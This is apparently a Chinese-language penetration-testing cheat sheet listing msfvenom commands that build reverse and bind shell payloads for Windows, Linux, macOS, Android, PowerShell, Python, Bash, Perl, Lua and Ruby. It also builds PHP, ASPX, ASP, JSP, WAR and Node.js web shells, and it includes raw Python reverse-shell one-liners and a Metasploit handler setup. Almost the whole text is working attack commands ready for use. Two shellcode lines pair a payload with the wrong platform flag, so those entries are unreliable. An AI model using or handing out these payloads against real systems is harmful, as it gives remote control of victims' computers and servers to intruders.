二进制
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe > shell.exe
windows下生成32位/64位payload时需要注意:以windows/meterpreter/reverse_tcp为例,该payload默认为32位,也可使用-a x86选项指定。如果要生成64位,则payload为windows/x64/meterpreter/reverse_tcp。
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform osx -f macho > shell.macho
Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw > shell.apk msfvenom -p android/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 R > test.apk
Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
Netcat
nc正向连接
msfvenom -p windows/shell_hidden_bind_tcp LHOST=10.211.55.2 LPORT=3333 -f exe> 1.exe
nc反向连接,监听
msfvenom -p windows/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe> 1.exe
Shellcode
基于Linux的Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f c
基于Windows的Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f c
基于Mac的Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform osx -f c
脚本
Python反弹shell
msfvenom -p cmd/unix/reverse_python LHOST=10.211.55.2 LPORT=3333 -f raw > shell.py msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw > shell.py
Python正向shell
python/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.2",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' python/python3 -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(("10.211.55.2",3333))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=10.211.55.2 LPORT=3333 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=10.211.55.2 LPORT=3333 -f raw > shell.pl
Lua
msfvenom -p cmd/unix/reverse_lua LHOST=10.211.55.2 LPORT=3333 -f raw -o shell.lua
Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw -o shell.rb
Web
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASPX
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f aspx -o shell.aspx
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f war > shell.war
nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f raw -o shell.js
Handlers
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST 10.211.55.2 set LPORT 3333 set ExitOnSession false exploit -j -z